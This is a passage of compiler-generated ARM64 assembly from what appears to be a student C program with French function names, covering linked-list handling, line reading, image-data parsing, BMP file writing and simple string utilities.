str w8, [x9, x10, lsl #2]
b LBB12_5
LBB12_5: ; in Loop: Header=BB12_3 Depth=1
ldur w8, [x29, #-12]
add w8, w8, #1
stur w8, [x29, #-12]
b LBB12_3
LBB12_6:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _initListe ; -- Begin function initListe
.p2align 2
_initListe: ; @initListe
.cfi_startproc
; %bb.0:
sub sp, sp, #32
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
mov x0, #24
bl _malloc
str x0, [sp, #8]
ldr x8, [sp, #8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB13_2
b LBB13_1
LBB13_1:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.17@PAGE
add x1, x1, l_.str.17@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB13_2:
ldr x8, [sp, #8]
str wzr, [x8]
ldr x8, [sp, #8]
; kill: def $x9 killed $xzr
str xzr, [x8, #8]
ldr x8, [sp, #8]
str xzr, [x8, #16]
ldr x0, [sp, #8]
ldp x29, x30, [sp, #16] ; 16-byte Folded Reload
add sp, sp, #32
ret
.cfi_endproc
; -- End function
.globl _addTail ; -- Begin function addTail
.p2align 2
_addTail: ; @addTail
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldr q0, [x1]
mov x0, sp
str q0, [sp]
ldr q0, [x1, #16]
str q0, [sp, #16]
bl _initNode
stur x0, [x29, #-16]
ldur x8, [x29, #-16]
; kill: def $x9 killed $xzr
str xzr, [x8, #32]
ldur x8, [x29, #-8]
ldr w8, [x8]
subs w8, w8, #0
cset w8, le
tbnz w8, #0, LBB14_2
b LBB14_1
LBB14_1:
ldur x8, [x29, #-16]
ldur x9, [x29, #-8]
ldr x9, [x9, #16]
str x8, [x9, #32]
b LBB14_3
LBB14_2:
ldur x8, [x29, #-16]
ldur x9, [x29, #-8]
str x8, [x9, #8]
b LBB14_3
LBB14_3:
ldur x8, [x29, #-16]
ldur x9, [x29, #-8]
str x8, [x9, #16]
ldur x9, [x29, #-8]
ldr w8, [x9]
add w8, w8, #1
str w8, [x9]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _affiche ; -- Begin function affiche
.p2align 2
_affiche: ; @affiche
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
ldr x8, [x8, #8]
str x8, [sp, #16]
b LBB15_1
LBB15_1: ; =>This Loop Header: Depth=1
; Child Loop BB15_3 Depth 2
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB15_7
b LBB15_2
LBB15_2: ; in Loop: Header=BB15_1 Depth=1
str wzr, [sp, #12]
b LBB15_3
LBB15_3: ; Parent Loop BB15_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #12]
ldr x9, [sp, #16]
ldr w9, [x9, #24]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB15_6
b LBB15_4
LBB15_4: ; in Loop: Header=BB15_3 Depth=2
ldr x8, [sp, #16]
ldr x8, [x8, #16]
ldrsw x9, [sp, #12]
ldr w9, [x8, x9, lsl #2]
; implicit-def: $x8
mov x8, x9
mov x9, sp
str x8, [x9]
adrp x0, l_.str.18@PAGE
add x0, x0, l_.str.18@PAGEOFF
bl _printf
b LBB15_5
LBB15_5: ; in Loop: Header=BB15_3 Depth=2
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB15_3
LBB15_6: ; in Loop: Header=BB15_1 Depth=1
adrp x0, l_.str.19@PAGE
add x0, x0, l_.str.19@PAGEOFF
bl _printf
ldr x8, [sp, #16]
ldr x8, [x8, #32]
str x8, [sp, #16]
b LBB15_1
LBB15_7:
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _get_line ; -- Begin function get_line
.p2align 2
_get_line: ; @get_line
.cfi_startproc
; %bb.0:
sub sp, sp, #80
.cfi_def_cfa_offset 80
stp x29, x30, [sp, #64] ; 16-byte Folded Spill
add x29, sp, #64
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
mov x8, #80
stur x8, [x29, #-16]
ldur x0, [x29, #-16]
bl _malloc
stur x0, [x29, #-24]
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB16_19
b LBB16_1
LBB16_1:
str xzr, [sp, #24]
ldur x0, [x29, #-8]
bl _fgetc
stur w0, [x29, #-28]
adds w8, w0, #1
cset w8, ne
tbnz w8, #0, LBB16_3
b LBB16_2
LBB16_2:
ldur x0, [x29, #-24]
bl _free
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB16_14
LBB16_3:
b LBB16_4
LBB16_4: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #24]
ldur x9, [x29, #-16]
subs x9, x9, #1
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB16_9
b LBB16_5
LBB16_5: ; in Loop: Header=BB16_4 Depth=1
ldur x0, [x29, #-24]
ldur x8, [x29, #-16]
add x1, x8, #80
bl _realloc
str x0, [sp, #16]
ldr x8, [sp, #16]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB16_7
b LBB16_6
LBB16_6: ; in Loop: Header=BB16_4 Depth=1
ldr x8, [sp, #16]
stur x8, [x29, #-24]
ldur x8, [x29, #-16]
add x8, x8, #80
stur x8, [x29, #-16]
b LBB16_8
LBB16_7: ; in Loop: Header=BB16_4 Depth=1
ldur x0, [x29, #-24]
bl _free
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB16_8
LBB16_8: ; in Loop: Header=BB16_4 Depth=1
b LBB16_9
LBB16_9: ; in Loop: Header=BB16_4 Depth=1
ldur w8, [x29, #-28]
ldur x9, [x29, #-24]
ldr x10, [sp, #24]
strb w8, [x9, x10]
ldr x8, [sp, #24]
add x8, x8, #1
str x8, [sp, #24]
b LBB16_10
LBB16_10: ; in Loop: Header=BB16_4 Depth=1
ldur x0, [x29, #-8]
bl _fgetc
stur w0, [x29, #-28]
subs w8, w0, #10
cset w8, eq
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB16_12
b LBB16_11
LBB16_11: ; in Loop: Header=BB16_4 Depth=1
ldur w8, [x29, #-28]
adds w8, w8, #1
cset w8, ne
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB16_12
LBB16_12: ; in Loop: Header=BB16_4 Depth=1
ldr w8, [sp, #12] ; 4-byte Folded Reload
tbnz w8, #0, LBB16_4
b LBB16_13
LBB16_13:
b LBB16_14
LBB16_14:
ldur x0, [x29, #-8]
bl _ferror
subs w8, w0, #0
cset w8, eq
tbnz w8, #0, LBB16_16
b LBB16_15
LBB16_15:
ldur x0, [x29, #-24]
bl _free
; kill: def $x8 killed $xzr
stur xzr, [x29, #-24]
b LBB16_16
LBB16_16:
ldur x8, [x29, #-24]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB16_18
b LBB16_17
LBB16_17:
ldur x8, [x29, #-24]
ldr x9, [sp, #24]
add x8, x8, x9
strb wzr, [x8]
b LBB16_18
LBB16_18:
b LBB16_19
LBB16_19:
ldur x0, [x29, #-24]
ldp x29, x30, [sp, #64] ; 16-byte Folded Reload
add sp, sp, #80
ret
.cfi_endproc
; -- End function
.globl _saveBMP ; -- Begin function saveBMP
.p2align 2
_saveBMP: ; @saveBMP
.cfi_startproc
; %bb.0:
sub sp, sp, #160
.cfi_def_cfa_offset 160
stp x29, x30, [sp, #144] ; 16-byte Folded Spill
add x29, sp, #144
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-8]
stur w0, [x29, #-68]
str w1, [sp, #72]
str x2, [sp, #64]
str x3, [sp, #56]
ldur w9, [x29, #-68]
mov w8, #3
mul w9, w8, w9
mov w11, #4
sdiv w10, w9, w11
mul w10, w10, w11
subs w9, w9, w10
subs w9, w11, w9
sdiv w10, w9, w11
mul w10, w10, w11
subs w9, w9, w10
str w9, [sp, #52]
ldur w9, [x29, #-68]
mul w8, w8, w9
ldr w9, [sp, #52]
add w8, w8, w9
ldr w9, [sp, #72]
mul w8, w8, w9
add w8, w8, #54
str w8, [sp, #48]
sub x0, x29, #62
mov w1, #0
mov x2, #54
bl _memset
mov w8, #66
sturb w8, [x29, #-62]
mov w8, #77
sturb w8, [x29, #-61]
mov w8, #54
sturb w8, [x29, #-52]
mov w8, #40
sturb w8, [x29, #-48]
mov w8, #1
sturb w8, [x29, #-36]
mov w8, #24
sturb w8, [x29, #-34]
strh wzr, [sp, #44]
strb wzr, [sp, #46]
str wzr, [sp, #20]
b LBB17_1
LBB17_1: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #4
cset w8, ge
tbnz w8, #0, LBB17_4
b LBB17_2
LBB17_2: ; in Loop: Header=BB17_1 Depth=1
ldr w8, [sp, #48]
ldr w9, [sp, #20]
mov w10, #8
mul w9, w10, w9
asr w8, w8, w9
and w8, w8, #0xff
ldr w9, [sp, #20]
add w11, w9, #2
sub x9, x29, #62
strb w8, [x9, w11, sxtw]
ldur w8, [x29, #-68]
ldr w11, [sp, #20]
mul w11, w10, w11
asr w8, w8, w11
and w8, w8, #0xff
ldr w11, [sp, #20]
add w11, w11, #18
strb w8, [x9, w11, sxtw]
ldr w8, [sp, #72]
ldr w11, [sp, #20]
mul w10, w10, w11
asr w8, w8, w10
and w8, w8, #0xff
ldr w10, [sp, #20]
add w10, w10, #22
strb w8, [x9, w10, sxtw]
b LBB17_3
LBB17_3: ; in Loop: Header=BB17_1 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB17_1
LBB17_4:
ldursw x9, [x29, #-68]
mov x8, #3
mul x8, x8, x9
ldrsw x9, [sp, #72]
mul x0, x8, x9
bl _malloc
str x0, [sp, #32]
ldr x8, [sp, #32]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB17_6
b LBB17_5
LBB17_5:
adrp x0, l_.str.20@PAGE
add x0, x0, l_.str.20@PAGEOFF
bl _printf
b LBB17_18
LBB17_6:
str wzr, [sp, #20]
b LBB17_7
LBB17_7: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
ldur w9, [x29, #-68]
ldr w10, [sp, #72]
mul w9, w9, w10
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB17_10
b LBB17_8
LBB17_8: ; in Loop: Header=BB17_7 Depth=1
ldr x8, [sp, #64]
ldrsw x9, [sp, #20]
ldr w8, [x8, x9, lsl #2]
str w8, [sp, #16]
ldrb w8, [sp, #16]
ldr x9, [sp, #32]
ldr w11, [sp, #20]
mov w10, #3
mul w11, w10, w11
strb w8, [x9, w11, sxtw]
ldr x9, [sp, #32]
ldr w11, [sp, #20]
mul w11, w10, w11
add w11, w11, #1
strb w8, [x9, w11, sxtw]
ldr x9, [sp, #32]
ldr w11, [sp, #20]
mul w10, w10, w11
add w10, w10, #2
strb w8, [x9, w10, sxtw]
b LBB17_9
LBB17_9: ; in Loop: Header=BB17_7 Depth=1
ldr w8, [sp, #20]
add w8, w8, #1
str w8, [sp, #20]
b LBB17_7
LBB17_10:
ldr x0, [sp, #56]
adrp x1, l_.str.21@PAGE
add x1, x1, l_.str.21@PAGEOFF
bl _fopen
str x0, [sp, #24]
ldr x8, [sp, #24]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB17_12
b LBB17_11
LBB17_11:
ldr x8, [sp, #56]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.22@PAGE
add x0, x0, l_.str.22@PAGEOFF
bl _printf
b LBB17_17
LBB17_12:
ldr x3, [sp, #24]
sub x0, x29, #62
mov x1, #54
mov x2, #1
bl _fwrite
ldr w8, [sp, #72]
subs w8, w8, #1
str w8, [sp, #20]
b LBB17_13
LBB17_13: ; =>This Inner Loop Header: Depth=1
ldr w8, [sp, #20]
subs w8, w8, #0
cset w8, lt
tbnz w8, #0, LBB17_16
b LBB17_14
LBB17_14: ; in Loop: Header=BB17_13 Depth=1
ldr x8, [sp, #32]
ldur w10, [x29, #-68]
mov w9, #3
mul w9, w9, w10
ldr w10, [sp, #20]
mul w9, w9, w10
add x0, x8, w9, sxtw
ldursw x9, [x29, #-68]
mov x8, #3
mul x1, x8, x9
ldr x3, [sp, #24]
mov x2, #1
str x2, [sp, #8] ; 8-byte Folded Spill
bl _fwrite
ldr x2, [sp, #8] ; 8-byte Folded Reload
ldr w8, [sp, #52]
mov x1, x8
ldr x3, [sp, #24]
add x0, sp, #44
bl _fwrite
b LBB17_15
LBB17_15: ; in Loop: Header=BB17_13 Depth=1
ldr w8, [sp, #20]
subs w8, w8, #1
str w8, [sp, #20]
b LBB17_13
LBB17_16:
ldr x0, [sp, #24]
bl _fclose
b LBB17_17
LBB17_17:
ldr x0, [sp, #32]
bl _free
b LBB17_18
LBB17_18:
ldur x9, [x29, #-8]
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB17_20
b LBB17_19
LBB17_19:
bl ___stack_chk_fail
LBB17_20:
ldp x29, x30, [sp, #144] ; 16-byte Folded Reload
add sp, sp, #160
ret
.cfi_endproc
; -- End function
.globl _loadImg ; -- Begin function loadImg
.p2align 2
_loadImg: ; @loadImg
.cfi_startproc
; %bb.0:
sub sp, sp, #176
.cfi_def_cfa_offset 176
stp x29, x30, [sp, #160] ; 16-byte Folded Spill
add x29, sp, #160
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
stur x1, [x29, #-16]
ldur x0, [x29, #-8]
bl _get_line
stur x0, [x29, #-24]
ldur x0, [x29, #-24]
bl _strlen
stur x0, [x29, #-32]
mov x0, #32
bl _malloc
stur x0, [x29, #-40]
mov x0, #4
bl _malloc
ldur x8, [x29, #-40]
str x0, [x8, #16]
ldur x0, [x29, #-24]
adrp x1, l_.str.23@PAGE
add x1, x1, l_.str.23@PAGEOFF
str x1, [sp, #16] ; 8-byte Folded Spill
bl _strtok
stur x0, [x29, #-48]
ldur x0, [x29, #-48]
bl _atoi
ldr x1, [sp, #16] ; 8-byte Folded Reload
stur w0, [x29, #-52]
mov x0, #0
str x0, [sp, #24] ; 8-byte Folded Spill
bl _strtok
stur x0, [x29, #-48]
ldur x0, [x29, #-48]
bl _atoi
ldr x1, [sp, #16] ; 8-byte Folded Reload
mov x8, x0
ldr x0, [sp, #24] ; 8-byte Folded Reload
stur w8, [x29, #-56]
bl _strtok
stur x0, [x29, #-48]
ldur x0, [x29, #-48]
bl _atoi
stur w0, [x29, #-60]
b LBB18_1
LBB18_1: ; =>This Loop Header: Depth=1
; Child Loop BB18_3 Depth 2
; Child Loop BB18_5 Depth 3
; Child Loop BB18_9 Depth 3
ldur x0, [x29, #-8]
bl _get_line
mov x8, x0
stur x8, [x29, #-24]
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB18_17
b LBB18_2
LBB18_2: ; in Loop: Header=BB18_1 Depth=1
ldur w8, [x29, #-52]
ldur x9, [x29, #-40]
str w8, [x9]
ldur w8, [x29, #-56]
ldur x9, [x29, #-40]
str w8, [x9, #8]
ldur w8, [x29, #-60]
ldur x9, [x29, #-40]
str w8, [x9, #4]
stur wzr, [x29, #-64]
movi d0, #0000000000000000
stur d0, [x29, #-72]
stur wzr, [x29, #-76]
ldur x0, [x29, #-24]
adrp x1, l_.str.23@PAGE
add x1, x1, l_.str.23@PAGEOFF
str x1, [sp, #8] ; 8-byte Folded Spill
bl _strtok
stur x0, [x29, #-48]
ldur x0, [x29, #-48]
bl _atoi
ldr x1, [sp, #8] ; 8-byte Folded Reload
ldur x8, [x29, #-40]
str w0, [x8, #12]
mov x0, #0
bl _strtok
stur x0, [x29, #-48]
b LBB18_3
LBB18_3: ; Parent Loop BB18_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB18_5 Depth 3
; Child Loop BB18_9 Depth 3
ldur x0, [x29, #-48]
mov w1, #44
bl _strchr
subs x8, x0, #0
cset w8, eq
tbnz w8, #0, LBB18_13
b LBB18_4
LBB18_4: ; in Loop: Header=BB18_3 Depth=2
ldur x9, [x29, #-48]
mov w8, #46
strb w8, [x9, #1]
ldur x0, [x29, #-48]
bl _strlen
stur x0, [x29, #-32]
ldur x0, [x29, #-48]
bl _atof
stur d0, [x29, #-72]
str wzr, [sp, #80]
b LBB18_5
LBB18_5: ; Parent Loop BB18_1 Depth=1
; Parent Loop BB18_3 Depth=2
; => This Inner Loop Header: Depth=3
ldrsw x8, [sp, #80]
ldur x9, [x29, #-32]
subs x9, x9, #2
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB18_8
b LBB18_6
LBB18_6: ; in Loop: Header=BB18_5 Depth=3
ldur d0, [x29, #-72]
fmov d1, #10.00000000
fmul d0, d0, d1
stur d0, [x29, #-72]
b LBB18_7
LBB18_7: ; in Loop: Header=BB18_5 Depth=3
ldr w8, [sp, #80]
add w8, w8, #1
str w8, [sp, #80]
b LBB18_5
LBB18_8: ; in Loop: Header=BB18_3 Depth=2
ldur d0, [x29, #-72]
fcvtzs w8, d0
stur w8, [x29, #-76]
str wzr, [sp, #76]
b LBB18_9
LBB18_9: ; Parent Loop BB18_1 Depth=1
; Parent Loop BB18_3 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #76]
ldur w9, [x29, #-76]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB18_12
b LBB18_10
LBB18_10: ; in Loop: Header=BB18_9 Depth=3
ldur x8, [x29, #-40]
ldr x9, [x8, #16]
ldursw x10, [x29, #-64]
mov w8, #0
str w8, [x9, x10, lsl #2]
ldur x8, [x29, #-40]
ldr x0, [x8, #16]
ldur w8, [x29, #-64]
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x1, x8, #5
bl _realloc
ldur x8, [x29, #-40]
str x0, [x8, #16]
ldur w8, [x29, #-64]
add w8, w8, #1
stur w8, [x29, #-64]
b LBB18_11
LBB18_11: ; in Loop: Header=BB18_9 Depth=3
ldr w8, [sp, #76]
add w8, w8, #1
str w8, [sp, #76]
b LBB18_9
LBB18_12: ; in Loop: Header=BB18_3 Depth=2
b LBB18_14
LBB18_13: ; in Loop: Header=BB18_3 Depth=2
ldur x0, [x29, #-48]
bl _atoi
scvtf d0, w0
stur d0, [x29, #-72]
ldur d0, [x29, #-72]
fcvtzs w8, d0
ldur x9, [x29, #-40]
ldr x9, [x9, #16]
ldursw x10, [x29, #-64]
str w8, [x9, x10, lsl #2]
ldur x8, [x29, #-40]
ldr x0, [x8, #16]
ldur w8, [x29, #-64]
add w9, w8, #1
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x1, x8, #5
bl _realloc
ldur x8, [x29, #-40]
str x0, [x8, #16]
ldur w8, [x29, #-64]
add w8, w8, #1
stur w8, [x29, #-64]
b LBB18_14
LBB18_14: ; in Loop: Header=BB18_3 Depth=2
mov x0, #0
adrp x1, l_.str.23@PAGE
add x1, x1, l_.str.23@PAGEOFF
bl _strtok
stur x0, [x29, #-48]
b LBB18_15
LBB18_15: ; in Loop: Header=BB18_3 Depth=2
ldur x8, [x29, #-48]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB18_3
b LBB18_16
LBB18_16: ; in Loop: Header=BB18_1 Depth=1
ldur w8, [x29, #-64]
ldur x9, [x29, #-40]
str w8, [x9, #24]
ldur x0, [x29, #-16]
ldur x8, [x29, #-40]
ldr q0, [x8]
add x1, sp, #32
str q0, [sp, #32]
ldr q0, [x8, #16]
str q0, [sp, #48]
bl _addTail
b LBB18_1
LBB18_17:
ldur x8, [x29, #-40]
ldr x0, [x8, #16]
bl _free
ldur x0, [x29, #-40]
bl _free
ldur x0, [x29, #-48]
bl _free
ldur x0, [x29, #-24]
bl _free
ldp x29, x30, [sp, #160] ; 16-byte Folded Reload
add sp, sp, #176
ret
.cfi_endproc
; -- End function
.globl _InterfaceControleChaine ; -- Begin function InterfaceControleChaine
.p2align 2
_InterfaceControleChaine: ; @InterfaceControleChaine
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur x0, [x29, #-8]
; kill: def $x8 killed $xzr
str xzr, [sp, #16]
str wzr, [sp, #12]
str wzr, [sp, #8]
str wzr, [sp, #4]
b LBB19_1
LBB19_1: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
add x8, x8, x9
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB19_8
b LBB19_2
LBB19_2: ; in Loop: Header=BB19_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB19_6
b LBB19_3
LBB19_3: ; in Loop: Header=BB19_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #9
cset w8, eq
tbnz w8, #0, LBB19_6
b LBB19_4
LBB19_4: ; in Loop: Header=BB19_1 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #10
cset w8, eq
tbnz w8, #0, LBB19_6
b LBB19_5
LBB19_5: ; in Loop: Header=BB19_1 Depth=1
ldr w8, [sp, #12]
add w8, w8, #1
str w8, [sp, #12]
b LBB19_6
LBB19_6: ; in Loop: Header=BB19_1 Depth=1
b LBB19_7
LBB19_7: ; in Loop: Header=BB19_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB19_1
LBB19_8:
ldrsw x8, [sp, #12]
lsr x0, x8, #0
bl _malloc
str x0, [sp, #16]
str wzr, [sp]
b LBB19_9
LBB19_9: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp]
add x8, x8, x9
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB19_16
b LBB19_10
LBB19_10: ; in Loop: Header=BB19_9 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp]
ldrsb w8, [x8, x9]
subs w8, w8, #32
cset w8, eq
tbnz w8, #0, LBB19_14
b LBB19_11
LBB19_11: ; in Loop: Header=BB19_9 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp]
ldrsb w8, [x8, x9]
subs w8, w8, #9
cset w8, eq
tbnz w8, #0, LBB19_14
b LBB19_12
LBB19_12: ; in Loop: Header=BB19_9 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp]
ldrsb w8, [x8, x9]
subs w8, w8, #10
cset w8, eq
tbnz w8, #0, LBB19_14
b LBB19_13
LBB19_13: ; in Loop: Header=BB19_9 Depth=1
ldur x8, [x29, #-8]
ldrsw x9, [sp]
add x8, x8, x9
ldrb w8, [x8]
ldr x9, [sp, #16]
ldrsw x10, [sp, #8]
add x9, x9, x10
strb w8, [x9]
ldr w8, [sp, #8]
add w8, w8, #1
str w8, [sp, #8]
b LBB19_14
LBB19_14: ; in Loop: Header=BB19_9 Depth=1
b LBB19_15
LBB19_15: ; in Loop: Header=BB19_9 Depth=1
ldr w8, [sp]
add w8, w8, #1
str w8, [sp]
b LBB19_9
LBB19_16:
ldr x8, [sp, #16]
ldrsw x9, [sp, #8]
add x8, x8, x9
strb wzr, [x8]
ldr x0, [sp, #16]
ldp x29, x30, [sp, #32] ; 16-byte Folded Reload
add sp, sp, #48
ret
.cfi_endproc
; -- End function
.globl _toUpper ; -- Begin function toUpper
.p2align 2
_toUpper: ; @toUpper
.cfi_startproc
; %bb.0:
sub sp, sp, #16
.cfi_def_cfa_offset 16
str x0, [sp, #8]
str wzr, [sp, #4]
b LBB20_1
LBB20_1: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
add x8, x8, x9
ldrb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB20_7
b LBB20_2
LBB20_2: ; in Loop: Header=BB20_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #97
cset w8, lt
tbnz w8, #0, LBB20_5
b LBB20_3
LBB20_3: ; in Loop: Header=BB20_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #122
cset w8, gt
tbnz w8, #0, LBB20_5
b LBB20_4
LBB20_4: ; in Loop: Header=BB20_1 Depth=1
ldr x8, [sp, #8]
ldrsw x9, [sp, #4]
ldrsb w8, [x8, x9]
subs w8, w8, #97
add w8, w8, #65
ldr x9, [sp, #8]
ldrsw x10, [sp, #4]
strb w8, [x9, x10]
b LBB20_5
LBB20_5: ; in Loop: Header=BB20_1 Depth=1
b LBB20_6
LBB20_6: ; in Loop: Header=BB20_1 Depth=1
ldr w8, [sp, #4]
add w8, w8, #1
str w8, [sp, #4]
b LBB20_1
LBB20_7:
add sp, sp, #16
ret
.cfi_endproc
; -- End function
.globl _InterLoadImage ; -- Begin function InterLoadImage
.p2align 2
_InterLoadImage: ; @InterLoadImage
.cfi_startproc
; %bb.0:
sub sp, sp, #64
.cfi_def_cfa_offset 64
stp x29, x30, [sp, #48] ; 16-byte Folded Spill
add x29, sp, #48
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
; kill: def $x8 killed $xzr
stur xzr, [x29, #-8]
mov x0, #1024
str x0, [sp] ; 8-byte Folded Spill
bl _malloc
mov x8, x0
ldr x0, [sp] ; 8-byte Folded Reload
stur x8, [x29, #-16]
bl _malloc
str x0, [sp, #24]
str xzr, [sp, #16]
str xzr, [sp, #8]
adrp x0, l_.str.53@PAGE
add x0, x0, l_.str.53@PAGEOFF
bl _printf
ldur x0, [x29, #-16]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldur x0, [x29, #-16]
bl _InterfaceControleChaine
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _toUpper
ldr x0, [sp, #8]
adrp x1, l_.str.44@PAGE
add x1, x1, l_.str.44@PAGEOFF
bl _strcmp
subs w8, w0, #0
cset w8, ne
tbnz w8, #0, LBB21_4
b LBB21_1
LBB21_1:
adrp x0, l_.str.54@PAGE
add x0, x0, l_.str.54@PAGEOFF
bl _printf
ldr x0, [sp, #24]
adrp x8, ___stdinp@GOTPAGE
ldr x8, [x8, ___stdinp@GOTPAGEOFF]
ldr x2, [x8]
mov w1, #1024
bl _fgets
ldr x0, [sp, #24]
bl _InterfaceControleChaine
str x0, [sp, #16]
ldr x0, [sp, #16]
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB21_3
b LBB21_2
LBB21_2:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.55@PAGE
add x1, x1, l_.str.55@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB21_3:
b LBB21_7
LBB21_4:
adrp x0, l_.str.56@PAGE
add x0, x0, l_.str.56@PAGEOFF
bl _printf
adrp x0, l_.str.57@PAGE
add x0, x0, l_.str.57@PAGEOFF
adrp x1, l_.str.11@PAGE
add x1, x1, l_.str.11@PAGEOFF
bl _fopen
stur x0, [x29, #-8]
ldur x8, [x29, #-8]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB21_6
b LBB21_5
LBB21_5:
adrp x8, ___stderrp@GOTPAGE
ldr x8, [x8, ___stderrp@GOTPAGEOFF]
ldr x0, [x8]
adrp x1, l_.str.58@PAGE
add x1, x1, l_.str.58@PAGEOFF
bl _fprintf
mov w0, #1
bl _exit
LBB21_6:
b LBB21_7
LBB21_7:
ldur x0, [x29, #-8]
ldp x29, x30, [sp, #48] ; 16-byte Folded Reload
add sp, sp, #64
ret
.cfi_endproc
; -- End function
.globl _avancerGetchar ; -- Begin function avancerGetchar
.p2align 2
_avancerGetchar: ; @avancerGetchar
.cfi_startproc
; %bb.0:
stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill
